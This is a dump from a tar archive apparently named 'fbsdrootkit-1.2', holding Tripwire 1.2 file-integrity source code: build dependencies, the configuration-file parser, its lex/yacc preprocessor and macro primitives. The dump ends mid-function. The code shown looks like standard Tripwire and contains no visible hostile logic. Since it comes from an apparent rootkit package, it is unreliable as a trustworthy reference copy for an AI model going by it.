../sigs/snefru/snefru.h nullsig.o: ../sigs/md5/md5.h nullsig.o: ../sigs/crc32/crc32.h nullsig.o: ../sigs/crc/crc.h nullsig.o: ../sigs/md2/md2.h nullsig.o: ../sigs/md4/md4.h nullsig.o: ../include/inode.h nullsig.o: ../include/sigs.h preen.o: preen.c preen.o: ../include/config.h preen.o: ../include/list.h preen.o: ../include/tripwire.h preen.o: ../sigs/snefru/snefru.h preen.o: ../sigs/md5/md5.h preen.o: ../sigs/crc32/crc32.h preen.o: ../sigs/crc/crc.h preen.o: ../sigs/md2/md2.h preen.o: ../sigs/md4/md4.h preen.o: ../include/inode.h preen.interp.o: preen.interp.c preen.interp.o: ../include/config.h preen.interp.o: ../include/list.h preen.interp.o: ../include/tripwire.h preen.interp.o: ../sigs/snefru/snefru.h preen.interp.o: ../sigs/md5/md5.h preen.interp.o: ../sigs/crc32/crc32.h preen.interp.o: ../sigs/crc/crc.h preen.interp.o: ../sigs/md2/md2.h preen.interp.o: ../sigs/md4/md4.h preen.interp.o: ../include/inode.h preen.report.o: preen.report.c preen.report.o: ../include/config.h preen.report.o: ../include/list.h preen.report.o: ../include/tripwire.h preen.report.o: ../sigs/snefru/snefru.h preen.report.o: ../sigs/md5/md5.h preen.report.o: ../sigs/crc32/crc32.h preen.report.o: ../sigs/crc/crc.h preen.report.o: ../sigs/md2/md2.h preen.report.o: ../sigs/md4/md4.h preen.report.o: ../include/inode.h siggen.o: siggen.c siggen.o: ../include/config.h siggen.o: ../include/list.h siggen.o: ../include/tripwire.h siggen.o: ../sigs/snefru/snefru.h siggen.o: ../sigs/md5/md5.h siggen.o: ../sigs/crc32/crc32.h siggen.o: ../sigs/crc/crc.h siggen.o: ../sigs/md2/md2.h siggen.o: ../sigs/md4/md4.h siggen.o: ../include/inode.h utils.o: utils.c utils.o: ../include/config.h utils.o: ../include/list.h utils.o: ../include/tripwire.h utils.o: ../sigs/snefru/snefru.h utils.o: ../sigs/md5/md5.h utils.o: ../sigs/crc32/crc32.h utils.o: ../sigs/crc/crc.h utils.o: ../sigs/md2/md2.h utils.o: ../sigs/md4/md4.h utils.o: ../include/inode.h fbsdrootkit-1.2/tripwire-1.2/src/config.parse.c100600 764 764 40007 5613344536 16641 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: config.parse.c,v 1.21 1994/07/21 01:03:26 gkim Exp $"; #endif /* * config.parse.c * * read in the preen.config file * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #include #include #ifdef DIRENT # include #else # ifndef XENIX # include # else /* XENIX */ # include # endif /* XENIX */ #endif /* DIRENT */ #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include #ifdef STRINGH #include #else #include #endif #include "../include/list.h" #include "../include/tripwire.h" #if defined(SYSV) && (SYSV < 4) #ifndef HAVE_LSTAT # define lstat(x,y) stat(x,y) #endif #endif /* SYSV */ #if !defined(major) #define major(x) (((unsigned)(x)>>16)&0xffff) #endif #if !defined(minor) #define minor(x) ((x)&0xffff) #endif /* prototypes */ char *mktemp(); static void configfile_descend(); #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif /* global */ /* we keep track of all the entry headers */ static struct list *prune_list = (struct list *) NULL; /* * configfile_read(struct list **pp_list, struct list **pp_entry_list) * * open the configuration file, and pulls out the {file/dir,ignore-flag} * pairs. * * (**pp_list) is pointer the head of the file list, where all the * files are added to. */ void configfile_read(pp_list, pp_entry_list) struct list **pp_list; struct list **pp_entry_list; { FILE *fpin, *fpout = (FILE *) NULL; char filename[MAXPATHLEN+512]; char ignorestring[1024]; char s[MAXPATHLEN+1024]; char configfile[MAXPATHLEN+512]; char *tmpfilename; char number[128]; int entrynum = 0; int err; /* to make code semi-reentrant */ list_reset(&prune_list); /* don't print banner if we're in print-preprocessor mode */ if (!printpreprocess && !quietmode) fputs("### Phase 1: Reading configuration file\n", stderr); /* generate temporary file name */ if ((tmpfilename = (char *) malloc(L_tmpnam + MAXPATHLEN)) == NULL) { perror("configfile_read: malloc()"); exit(1); }; (void) strcpy(tmpfilename, TEMPFILE_TEMPLATE); if ((char *) mktemp(tmpfilename) == NULL) { perror("configfile_read: mktemp()"); exit(1); } /* generate configuration file name */ if (specified_configmode != SPECIFIED_FILE) sprintf(configfile, "%s/%s", config_path, config_file); else (void) strcpy(configfile, specified_configfile); /* open the files */ /* were we given a specific fd to use? */ if (specified_configmode) { char errstr[1024]; /* we already checked to see that it's a valid fd */ if (!(fpin = (FILE *) fdopen(specified_configfd, "r"))) { sprintf(errstr, "tripwire: Couldn't open fd! fdopen()"); perror(errstr); exit(1); } rewind(fpin); if ((err = ftell(fpin)) != 0) { die_with_err("configfile_read: ftell()", NULL); } } /* otherwise, it's just a normal file */ else if ((fpin = fopen(configfile, "r")) == NULL) { char errstr[1024]; sprintf(errstr, "tripwire: Couldn't open config file '%s'", configfile); perror(errstr); exit(1); } /* if we've already preprocessed the file, we can skip this */ /* uh, we used to only parse the tw.config file once. * this causes problems during interactive updates. * so, with v1.2, we're a little slower, so sue me. * -ghk */ err = umask(077); /* to protect the tempfile */ if ((fpout = fopen(tmpfilename, "w+")) == NULL) { sprintf(s, "tripwire: Couldn't open config file '%s'", configfile); perror(s); exit(1); } (void) umask(err); /* return it to its former state */ /* The following unlink accomplishes two things: * 1) if the program terminates, we won't leave a temp * file sitting around with potentially sensitive names * in it. * 2) the file is "hidden" while we run */ if (unlink(tmpfilename) < 0) { perror("configfile_read: unlink()"); exit(1); } free(tmpfilename); /* * pass 0: preprocess file * call the yacc hook, located in y.tab.c */ tw_macro_parse(configfile, fpin, fpout, (struct list **) pp_entry_list); if (!specified_configmode) (void) fclose(fpin); fflush(fpout); rewind(fpout); fpin = fpout; if ((err = ftell(fpin)) != 0) { die_with_err("configfile_read: ftell()", NULL); } /* do we just print out the file, and then exit? */ if (printpreprocess) { int t; while ((t = getc(fpin)) != EOF) putc((char) t, stdout); exit(0); } ALREADY_PREPROCESSED: /* LABEL */ ; /* pass 1: get all of the prune entries '!' */ while (fgets(s, sizeof(s), fpin) != NULL) { int prune_mode; static int linenumber = 1; /* read in database entry */ if ((err = sscanf(s, "%s %s", filename, ignorestring)) == 1) { (void) strcpy(ignorestring, defaultignore); } else if (err != 2) { fprintf(stderr, "configfile_read: parse error in the following line\n"); fprintf(stderr, "\t>> %s", s); exit(1); } linenumber++; /* check for removeflag (preceding "!" or "=") */ switch (*filename) { case '!': prune_mode = PRUNE_ALL; (void) strcpy(filename, filename+1); /* adjust name */ break; case '=': prune_mode = PRUNE_ONE; (void) strcpy(filename, filename+1); /* adjust name */ break; default: continue; /* nothing */ } /* check for fully qualified pathname */ if (*filename != '/') { fprintf(stderr, "config: %s is not fully qualified! Skipping...\n" , filename); /* XXX -- error handling needed here */ continue; } /* expand any escaped octal characters in name */ filename_escape_expand(filename); /* add to local prune list */ list_set(filename, "", 0, &prune_list); SPDEBUG(1000) printf("configfile_read: pruning %s\n", filename); /* set appropriate prune flag */ list_setflag(filename, prune_mode, &prune_list); } /* rewind the file for pass 2 */ rewind(fpin); /* pass 2: build file lists */ /* it's time for another banner */ if (!printpreprocess && !quietmode) fputs("### Phase 2: Generating file list\n", stderr); while (fgets(s, sizeof(s), fpin) != NULL) { int howdeep; int prunedir = 0; /* * get {filename,ignore} pair: * if only argument, then apply default ignore-flags * * note that {ignore} used in the tripwire.config file is * different than the one stored in the database file! * * humans use the [N|R|L]+/-[pinugsmc3] format. in the database, * we use the old style where any capitalized letter * means it's to be ignored. */ /* make sure to remember that the ignorestring could be a comment! */ if ( ((err = sscanf(s, "%s %s", filename, ignorestring)) == 1) || (ignorestring[0] == '#')) { (void) strcpy(ignorestring, defaultignore); } else if (err != 2) { fprintf(stderr, "'%s'\nconfigfile_read: parse error\n", s); exit(1); } /* skip all prune entries (we've already taken care of it) */ if (*filename == '!') continue; /* check for leading '=', prune after one recursion */ else if (*filename == '=') { (void) strcpy(filename, filename+1); prunedir++; } /* check for fully qualified pathname */ if (*filename != '/') { fprintf(stderr, "config: %s is not fully qualified! Skipping...\n" , filename); /* XXX -- error handling needed here */ continue; } /* expand any escaped octal characters in name */ filename_escape_expand(filename); /* * convert configuration-file style ignore-string to our database * representation. */ ignore_configvec_to_dvec(ignorestring); /* add it to the list while it still has escaped characters */ sprintf(number, "%d %s", entrynum, ignorestring); list_set(filename, number, 0, pp_entry_list); SPDEBUG(1000) printf("configfile_read: adding %s (%d)\n", filename, number); /* reverse index (number --> entryname) */ { char eindex[50]; sprintf(eindex, "%d", entrynum); list_set(eindex, filename, 0, pp_entry_list); list_setflag(eindex, 1, pp_entry_list); } /* pass down the priority -- based on how fully-qualified the * entry was. */ howdeep = slash_count(filename); /* * add the entry to list of entry headers (used for incremental * database updates. */ configfile_descend(filename, ignorestring, howdeep, prunedir, pp_list, entrynum++); } /* end reading file */ /* print out the list, if we're in a debuggin mode */ if (debuglevel > 10) list_print(pp_list); /* clean up */ if (!specified_configmode) (void) fclose(fpin); rewind(fpout); return; } /* * configfile_descend(char *filename, char *ignorestring, int howdeep, * int prunedir, struct list **pp_list, * int entrynum) * * recurses down the specified filename. when it finally hits a real * file, it is added to the list of files. * * if (prunedir) is set, then we quit after one recursion. * * this routine also resolves any multiple instances of a file by * using (howdeep) as a precendence level. * * (entrynum) is the unique entry number tag from tw.config. */ static void configfile_descend (filename, ignorestring, howdeep, prunedir, pp_list, entrynum) char *filename; char *ignorestring; int howdeep; int prunedir; struct list **pp_list; int entrynum; { struct stat statbuf; static int countrecurse = 0; /* count how many levels deep we are */ static int majordev, minordev; char t[512]; extern int errno; countrecurse++; SPDEBUG(10) printf("---> %d: %s\n", countrecurse, filename); /* check to see if it's on the prune list */ if (list_lookup(filename, &prune_list) != NULL) { int flag; /* return only if it was a '!' directive */ if ((flag = list_getflag(filename, &prune_list)) == PRUNE_ALL) { countrecurse--; return; } else if (flag == PRUNE_ONE) prunedir = 1; } /* get the stat structure of the (real) file */ if (lstat(filename, &statbuf) < 0) { char err[MAXPATHLEN+256]; int real_err = errno; /* in case sprintf clobbers the value */ if (debuglevel > 10) { sprintf(err, "configfile_descend: lstat(%s)", filename); } else { sprintf(err, "%s: %s", progname, filename); } errno = real_err; if (!quietmode) perror(err); /* so we just skip it */ countrecurse--; return; } /* * record our {major,minor} device pair if this is our first time * recursing. then we check if it changes. if it does, we've crossed * a filesystem, and we prune our tree. */ if (countrecurse == 1) { SPDEBUG(4) printf("configfile_descend: r=%d: %s\n", countrecurse, filename); majordev = major(statbuf.st_dev); minordev = minor(statbuf.st_dev); } else { #ifdef apollo /* * It seems that Apollos have (3904,0) for dirs, (3904,1) for files. * So how do we prevent ourselves from crossing filesystems * (descending into mounted disks)? */ if ((major(statbuf.st_dev) != majordev || minor(statbuf.st_dev) != minordev) && ! ( majordev == 3904 && minordev == 0 && major(statbuf.st_dev) == 3904 && minor(statbuf.st_dev) == 1 ) && ! ( majordev == 3904 && minordev == 1 && major(statbuf.st_dev) == 3904 && minor(statbuf.st_dev) == 0 )) #else if (major(statbuf.st_dev) != majordev || minor(statbuf.st_dev) != minordev) #endif { SPDEBUG(4) printf("configfile_descend: pruning '%s' n(%d,%d) != o(%d, %d)\n", filename, major(statbuf.st_dev), minor(statbuf.st_dev), majordev, minordev); countrecurse--; return; /* prune */ } } /* * if it is a directory file, then we read in the directory entries * and then recurse into the directory. * * remember, check to see if it's a symbolic link. we never traverse * them. */ if (((statbuf.st_mode & S_IFMT) == S_IFDIR) #if !defined(SYSV) || (SYSV > 3) && !((statbuf.st_mode & S_IFMT) == S_IFLNK)) #else ) #endif { DIR *p_dir; #ifdef DIRENT struct dirent *pd; #else struct direct *pd; #endif char recursefile[MAXPATHLEN+256]; /* handle prunedir flag */ /* * concatenate entry number to the ignore-string */ sprintf(t, "%d %s", entrynum, ignorestring); /* * just nix it from the list? */ /* XXX if (strcmp(filename, "/tmp") == 0) ; if (strcmp(filename, "/tmp") == 0) list_print(pp_list); */ /* * Remember: we have escaped filenames (i.e. filenames with * funny characters replaced with \123 sequences) in cf and db * files, and maybe in some report messages (to avoid messing * up silly terminals that cannot cope with those characters; * why do people then have such files?), but internally we save * them in all their gory detail. Otherwise it would be too * hard to keep track of where to convert a name, or if it has * been converted already; in particular we screwed up on * saving the same way for list_set and list_set_flag. */ /*zzzzz Was: remember, we save filenames with escape sequences in the lists zzzzz*/ list_set(filename, t, howdeep, pp_list); SPDEBUG(1000) printf("configfile_descend: adding %s\n", filename); (void) list_setflag(filename, FLAG_NOOPEN, pp_list); /* if it's a symbolic link, make sure we flag it as such! */ #if !defined(SYSV) || (SYSV > 3) if ((statbuf.st_mode & S_IFMT) == S_IFLNK) { (void) list_setflag(filename, FLAG_SYMLINK, pp_list); } #endif if (prunedir) { countrecurse--; return; } SPDEBUG(4) fprintf(stderr, "configfile_descend: %s: it's a directory!\n", filename); if ((p_dir = opendir(filename)) == NULL) { if (debuglevel > 10) { perror("configfile_descend: opendir()"); } else { char err[MAXPATHLEN+256]; int real_errno = errno; sprintf(err, "%s: %s", progname, filename); errno = real_errno; if (!quietmode) perror(err); } countrecurse--; return; } /* broken xenix compiler returns "illegal continue" ?!? */ #ifdef XENIX #define XCONTINUE goto XENIX_CONT #else #define XCONTINUE continue #endif for (pd = readdir(p_dir); pd != NULL; pd = readdir(p_dir)) { /* we could use strcmp in the following, but this is much faster */ if (pd->d_name[0] == '.') { if (pd->d_name[1] == 0) /* must be . */ XCONTINUE; else if (pd->d_name[1] == '.') { if (pd->d_name[2] == 0) /* must be .. */ XCONTINUE; } } SPDEBUG(4) printf("--> descend: %s\n", pd->d_name); /* build pathname of file */ /* Assume all filenames ar root anchored. If so, and filename[1] is null, then filename must be '/'. Thus we don't need to concatenate a slash into the recursefile. */ if (filename[1] == '\0') { sprintf(recursefile, "%s%s", filename, pd->d_name); } else { sprintf(recursefile, "%s/%s", filename, pd->d_name); } /* recurse. it'll pop right back if it is just a file */ configfile_descend(recursefile, ignorestring, howdeep, 0, pp_list, entrynum); XENIX_CONT: ; } /* end foreach file */ /* cleanup */ closedir(p_dir); } /* end if dir */ else { /* * concatenate entry number to the ignore-string */ sprintf(t, "%d %s", entrynum, ignorestring); /* add to list */ list_set(filename, t, howdeep, pp_list); /* * if it is a special file or device, add it to the list, but * make sure we don't open it and read from it! */ switch (statbuf.st_mode & S_IFMT) { case S_IFIFO: case S_IFCHR: case S_IFBLK: #if !defined(SYSV) || (SYSV > 3) #ifndef apollo /* Foolish Apollos define S_IFSOCK same as S_IFIFO in /bsd4.3/usr/include/sys/stat.h */ case S_IFSOCK: #endif #endif (void) list_setflag(filename, FLAG_NOOPEN, pp_list); break; #if !defined(SYSV) || (SYSV > 3) case S_IFLNK: /* if it's a symbolic link, make sure we flag it as such! */ (void) list_setflag(filename, FLAG_SYMLINK, pp_list); break; #endif default: break; /* do nothing for regular files */ } } /* end else dir */ countrecurse--; return; } fbsdrootkit-1.2/tripwire-1.2/src/config.pre.l100600 764 764 6241 5614756407 16315 0ustar dfdf%{ /* $Id: config.pre.l,v 1.13 1994/07/25 15:40:55 gkim Exp $ */ /* * config.pre.l * * lexical analyzer for preprocessing tw.config files. * * note that escaped sequences in the token must be * expanded manually. * * Gene Kim * Purdue University * October 4, 1992 */ /* * note that strings can contain '@'s, but they * cannot start with them! * * similarly, we can have #'s in strings, but they * cannot be the first character! */ %} WS [ \t] COMMENT [#] EOL [\n] DIRECTIVE @{2,2} STRING ([^ \t\n\#\(\)]|\\.)+([^ \t\n\(\)]|\\.)* LPAREN [\(] RPAREN [\)] ANDAND \&{2,2} OROR \|{2,2} BSLASH [\\] %% {WS}+ { /* eat spaces */ } {BSLASH}{EOL} { /* eat line continuations */ linenumber++; } {COMMENT}[^\n]* { /* eat comments */ } ^{DIRECTIVE}{WS}*include { return INCLUDE; } ^{DIRECTIVE}{WS}*define { return DEFINE; } ^{DIRECTIVE}{WS}*undef { return UNDEF; } ^{DIRECTIVE}{WS}*ifdef { return IFDEF; } ^{DIRECTIVE}{WS}*ifndef { return IFNDEF; } ^{DIRECTIVE}{WS}*ifhost { return IFHOST; } ^{DIRECTIVE}{WS}*ifnhost { return IFNHOST; } ^{DIRECTIVE}{WS}*contents { return CONTENTS; } ^{DIRECTIVE}{WS}*dbaseversion { return DBASEVERSION; } ^{DIRECTIVE}{WS}*else { return ELSE; } ^{DIRECTIVE}{WS}*endif { return ENDIF; } ^{DIRECTIVE}{WS}*echo { return ECHOTHIS; } {EOL} { linenumber++; return EOL; } {ANDAND} { return ANDAND; } {OROR} { return OROR; } {LPAREN} { return LPAREN; } {RPAREN} { return RPAREN; } {STRING} { char *pcin, *pcout, macro[1024], *pcm; static char outstring[1024]; char *pctmp; yytext[yyleng] = '\0'; yylval.string = yytext; SPDEBUG(20) { printf("---(prestring)---> %s\n", yytext); } pcin = yytext; pcout = outstring; for (; *pcin; pcin++) { /* check for macro expansion */ if (*pcin == '@' && *(pcin+1) && *(pcin+1) == '@') { int curlymode = 0; /* bounded by '{' and '}' */ pcm = macro; pcin += 2; while (*pcin && (isalnum(*pcin) || *pcin == '_' || *pcin == '{' || *pcin == '}')) { if (*pcin == '{') { /* nested curlies are not allowed! */ if (curlymode) { fprintf(stderr, "warning: line %d: nested `{}' expressions are not allowed!\n", linenumber); } else { curlymode = 1; } pcin++; continue; } if (curlymode && *pcin == '}') { pcin++; curlymode = 0; break; } *pcm++ = *pcin++; } *pcm++ = '\0'; SPDEBUG(20) { printf("--(macro)--> %s\n", macro); } /* expand macro */ if (tw_mac_ifdef(macro) == 0) { fprintf(stderr, "warning: uninitialized directive '%s' at line %d in config file\n\t'%s' !\n\t\t(Hint: maybe a misspelled directive?)\n", macro, linenumber, currparsefile); } else { /* else substitute in the input stream */ pctmp = tw_mac_dereference(macro); assert(pctmp != NULL); SPDEBUG(20) { printf("--(dmacro)--> %s\n", pctmp); } strcpy(pcout, pctmp); pcout += strlen(pctmp); } pcin--; /* rewind for loop */ continue; } *pcout++ = *pcin; } *pcout++ = '\0'; yylval.string = outstring; if (yaccdebuglevel > 10) printf("--(STRING)--> %s\n", outstring); return STRING; } fbsdrootkit-1.2/tripwire-1.2/src/config.pre.y100600 764 764 26334 5620062040 16333 0ustar dfdf%token COMMENT %token EOL %token STRING %token INCLUDE %token DEFINE %token UNDEF %token ELSE %token ENDIF %token CONTENTS %token DBASEVERSION %token LPAREN %token RPAREN %token ANDAND %token OROR %token ECHOTHIS %token BSLASH %token ESCCHAR %{ /* $Id: config.pre.y,v 1.23 1994/08/04 03:44:32 gkim Exp $ */ /* * config.y * * tw.config preprocessor parser for yacc. * * This implementation does an unfortunately large number of * malloc()'s and free()'s to store the lexeme values. Although * memory leaks are few, too much time is spent doing memory * allocation. * * At this point, I would argue that this is not too significant, * since we only run this routine once. * * Gene Kim * Purdue University * October 5, 1992 * * Modified by Cal Page to work with linux, March 9, 1994 */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #ifdef MALLOCH #include #endif #include #include #include #include #include #include "../include/list.h" #include "../include/tripwire.h" extern FILE *yyin; extern FILE *yyout; #ifdef TW_LINUX #include void *yy_flex_realloc(void *x,int y) { return realloc(x,y); } void *yy_flex_alloc (int y ) { return malloc(y); } void yy_flex_free (void *x ) { free(x); } #define yy_strcpy(a,b) strcpy((a),(b)) #endif /* TW_LINUX */ #define INCLUDE_STACK_SZ 16 /* max num of nested includes */ int yaccdebuglevel = 0; static int linenumber = 1; static FILE *fp_stack[INCLUDE_STACK_SZ]; static int linenumber_stack[INCLUDE_STACK_SZ]; static char *filename_stack[INCLUDE_STACK_SZ]; static int stackpointer = 0; static int found_db_version = 0; static struct list **pp_entry_list_global = NULL; static char currparsefile[MAXPATHLEN+1024]; /* prototypes */ static char *string_dequote(); static void include_push(); static FILE *include_pop(); /* this is for some versions of flex and bison, who don't make any * effort to look like lex and yacc. */ #ifdef LINUX extern FILE **yyin, *yyout; void *yy_flex_realloc(void *x,int y) { return realloc(x,y); } void *yy_flex_alloc (int y ) { return malloc(y); } void yy_flex_free (void *x ) { free(x); } #endif struct comp { char *string; int directive; }; %} %union { struct comp *comp; char *string; long val; } %left COMMENT ESCCHAR STRING %token IFDEF IFNDEF IFHOST IFNHOST /* %type word words directive colines coline else */ %type word %type words directive colines coline else %type if_expr host_expr %left ANDAND OROR %start lines %% lines : lines line | ; /* we do all of the line-emitting in this production (line) */ line : directive EOL { /* linenumber++; */ if ($1) { fprintf(yyout, "%s\n", $1); free($1); } } | words EOL { /* linenumber++; */ if ($1) { fprintf(yyout, "%s\n", $1); free($1); } } ; colines : colines coline { /* If coline is null, just pass on colines. */ if ($2 == NULL) { $$ = $1; } else { /* concatenate the two terminals together */ if ($1 == NULL) { $$ = (char *) malloc((unsigned) strlen($2) + 1); $$[0] = '\0'; } else { $$ = (char *) malloc((unsigned) (strlen($1) + strlen($2)) + 2); (void) strcpy($$, $1); (void) strcat($$, "\n"); /* free up the left component */ free($1); } (void) strcat($$, $2); /* free up the right component */ if ($2) free($2); } SPDEBUG(11) printf("--(coline)--> (%s)\n", $$); } | { $$ = NULL; } ; coline : directive EOL { $$ = $1; /* linenumber++; */} | words EOL { $$ = $1; /* linenumber++; */} ; else : ELSE colines { $$ = $2; } | { $$ = NULL; } ; if_expr : LPAREN if_expr RPAREN { $$ = $2; } | if_expr ANDAND if_expr { $$ = $1 && $3; } | if_expr OROR if_expr { $$ = $1 || $3; } | word { check_varname($1->string); $$ = tw_mac_ifdef($1->string); } host_expr: LPAREN host_expr RPAREN { $$ = $2; } | host_expr ANDAND host_expr { $$ = $1 && $3; } | host_expr OROR host_expr { $$ = $1 || $3; } | word { $$ = tw_mac_ifhost($1->string); } directive: DEFINE word { check_varname($2->string); tw_mac_define($2->string, ""); $$ = NULL; } | DEFINE word word { check_varname($2->string); tw_mac_define($2->string, $3->string); $$ = NULL; } | UNDEF word { check_varname($2->string); tw_mac_undef($2->string); $$ = NULL; } | IFDEF if_expr { $1 = $2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | IFNDEF if_expr { $1 = !$2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | IFHOST host_expr { $1 = $2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | IFNHOST host_expr { $1 = !$2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | INCLUDE word { /* push a new @@include file onto the include stack */ include_push($2->string, &yyin); $$ = NULL; } | CONTENTS word { char *pc = "@@contents "; /* record contents in list */ list_set($2->string, "", 0, pp_entry_list_global); /* reconstruct and emit the entire string */ $$ = (char *) malloc((unsigned) (strlen($2->string) + strlen(pc)) + 1); (void) strcpy($$, pc); (void) strcat($$, $2->string); /* free up the right side */ free($2->string); free($2); } | ECHOTHIS words { fprintf(stderr, "tw.config: echo: %s\n", $2); $$ = NULL; } | DBASEVERSION word { int version; if (sscanf($2->string, "%d", &version) != 1) { yyerror(""); } /* check if the database format is too old */ if (version != db_version_num) { fprintf(stderr, "error: database format %d is no longer supported!\n\tSee tw.config(5) manual page for details)\n\t'%s' (expecting version %d)!\n", version, currparsefile, db_version_num); exit(1); } /* free up the right side */ free($2->string); free($2); /* we must see one of these productions in the file */ found_db_version = 1; $$ = NULL; } ; words : words word { /* concatenate the two terminals together */ if ($1 == NULL) { $$ = (char *) malloc((unsigned) strlen($2->string) + 1); $$[0] = '\0'; } else { $$ = (char *) malloc((unsigned) (strlen($1) + strlen($2->string)) + 2); (void) strcpy($$, $1); /* XXX: This doesn't work! if ($2 && (!$2->directive)) */ if ($2) (void) strcat($$, " "); /* free up the left component */ free($1); } (void) strcat($$, $2->string); /* free up the right component */ if ($2) { free($2->string); free($2); } SPDEBUG(11) printf("--(words)--> (%s)\n", $$); } | { $$ = NULL; } ; word : STRING { struct comp *pcomp; char *pc; $$ = (struct comp *) malloc(sizeof(struct comp)); pc = $1; $$->string = strcpy((char *) malloc((unsigned) strlen($1) + 1), $1); $$->directive = 0; } ; %% #include "lex.yy.c" /*ARGSUSED*/ yyerror(s) char *s; { fprintf(stderr, "error: syntax error at line %d in config file\n\t'%s' !\n", ++linenumber, currparsefile); } /* * void * tw_macro_parse(char *filename, FILE *fpin, FILE *fpout, * struct list **pp_entry_list) * * wrapper around yyparse(), initiailzing input and output data. */ void tw_macro_parse(filename, fpin, fpout, pp_entry_list) char *filename; FILE *fpin, *fpout; struct list **pp_entry_list; { static int firsttime = 1; stackpointer = 0; /* set up input and output pointers */ yyin = fpin; yyout = fpout; #ifdef FLEX_SCANNER if (!firsttime) { yyrestart(yyin); } else { firsttime = 0; } #endif /* set up initial filename */ strcpy( currparsefile, filename ); pp_entry_list_global = pp_entry_list; (void) yyparse(); } /* counters odd behaviour of flex -- Simon Leinen */ #ifdef yywrap # undef yywrap #endif yywrap() { /* check to see if we've reached the bottom of the @@include stack */ if (include_pop()) { linenumber++; return 0; } /* close up parser */ return 1; } /* * static char * * string_dequote(char *s) * * remove pairs of quoted strings. */ static char * string_dequote(s) char *s; { char temp[1024]; /* do we need to do anything? */ if (s[0] != '"') { return s; } (void) strncpy(temp, s+1, strlen(s) - 2); (void) strcpy(s, temp); return s; } /* * void * include_push(char *filename, FILE **p_fp_old) * * return a stdio (FILE *) pointer to the opened (filename), saving * the old (FILE *) pointer and line number on the stack. * * returns (NULL) when we pop back to the original file. */ static void include_push(filename, p_fp_old) char *filename; FILE **p_fp_old; { static FILE *fp; char *pc; extern int errno; /* check for stack overflow */ if (stackpointer == INCLUDE_STACK_SZ) { fprintf(stderr, "error: too many nested includes at line %d in file\n\t'%s' !\n", linenumber, currparsefile); exit(1); } /* dequote the include filename */ string_dequote(filename); /* save the old file pointer, filename, and linenumber on the stack */ fp_stack[stackpointer] = *p_fp_old; (void) strcpy((pc = (char *) malloc((unsigned) strlen(currparsefile) + 1)), currparsefile); filename_stack[stackpointer] = pc; linenumber_stack[stackpointer++] = linenumber; /* try opening the file */ if ((fp = fopen(filename, "r")) == NULL) { if (errno == ENOENT) { fprintf(stderr, "error: @@include '%s': file not found at line %d in config file\n\t'%s' !\n", filename, linenumber, currparsefile); exit(1); } else { char msg[100]; sprintf(msg, "%s: fopen()", filename); perror(msg); exit(1); } } /* replace old pointer with new */ *p_fp_old = fp; /* reset line number and filename */ linenumber = 0; strcpy( currparsefile, filename ); } /* * FILE * * include_pop() * * pop the last file structure off the @@include stack. * * returns NULL when we've exhausted the stack. */ static FILE * include_pop() { /* check for stack underflow */ if (stackpointer-- == 0) return NULL; (void) fclose(yyin); /* pop off the line numbers and the stdio file pointer */ yyin = fp_stack[stackpointer]; #ifdef FLEX_SCANNER yyrestart(yyin); #endif linenumber = linenumber_stack[stackpointer]; strcpy( currparsefile, filename_stack[stackpointer] ); free(filename_stack[stackpointer]); return yyin; } int check_varname(pc) char *pc; { for (; *pc; pc++) { if (!(isalnum(*pc) || (*pc == '_'))) { fprintf(stderr, "warning: illegal character '%c' in @@define at line %d in file\n\t'%s' !\n", *pc, linenumber, currparsefile); } } return 0; } fbsdrootkit-1.2/tripwire-1.2/src/config.prim.c100600 764 764 5675 5547660222 16471 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: config.prim.c,v 1.13 1994/04/04 00:34:26 gkim Exp $"; #endif /* * config.prim.c * * process configuration file directive primitives (ala m4 or cpp). * * ifhost * define * undef * ifdef * ifndef * * Gene Kim * Purdue University * September 28, 1992 */ #include "../include/config.h" #include #ifdef __STDC__ # include # include #endif #ifdef STRINGH #include #else #include #endif #include "../include/tripwire.h" #include "../include/list.h" #include #include #ifndef GETHOSTNAME #include #endif #ifndef MAXHOSTNAMELEN #define MAXHOSTNAMELEN 64 #endif static struct list *defines_table = (struct list *) NULL; /* * void * tw_mac_define(char *varname, char *varvalue) * * set (varname) to (varvalue) in the defines table */ void tw_mac_define(varname, varvalue) char *varname, *varvalue; { list_set(varname, varvalue, 0, &defines_table); } /* char * * tw_mac_dereference(char *varname) * * returns the (varvalue) in the defines table. */ char * tw_mac_dereference(varname) char *varname; { return list_lookup(varname, &defines_table); } /* * void * tw_mac_undef(char *varname) * * removes (varname) from the defines table. */ void tw_mac_undef(varname) char *varname; { list_unset(varname, &defines_table); } /* * int * tw_mac_ifdef(char *varname) * * returns 1 if (varname) is in defines table, else 0. */ int tw_mac_ifdef(varname) char *varname; { return list_isthere(varname, &defines_table); } /* * int * tw_mac_ifhost(char *hostname) * * returns 1 if (hostname) matches our hostname */ int tw_mac_ifhost(hostname) char *hostname; { char realhostname[MAXHOSTNAMELEN]; register char *tc, *sc; #ifndef GETHOSTNAME struct utsname sysinfo; if (uname(&sysinfo) < 0) die_with_err("filename_hostname_expand: uname()", (char *) NULL); (void) strncpy(realhostname, sysinfo.nodename, MAXHOSTNAMELEN); #else /* GETHOSTNAME */ /* get the hostname */ if (gethostname(realhostname, MAXHOSTNAMELEN) < 0) die_with_err("filename_hostname_expand: gethostname()", (char *) NULL); #endif /* GETHOSTNAME */ /* check for a period in the hostname (only if there are periods in the * the real hostnames) */ if (!strchr(hostname, '.') && strchr(realhostname, '.')) { fprintf(stderr, "warning: hostname in @@ifhost directives must be fully qualified!\n"); fprintf(stderr, "\t\t(e.g. 'mentor.cc.purdue.edu')\n"); } /* check for a match between the hostnames (case insensitive) */ for (sc = realhostname, tc = hostname; *sc && *tc ; sc++, tc++) { if (*tc == *sc) continue; else if (isupper(*tc) && islower(*sc)) { if (tolower(*tc) != *sc) return 0; } else if (islower(*tc) && isupper(*sc)) { if (*tc != tolower(*sc)) return 0; } else return 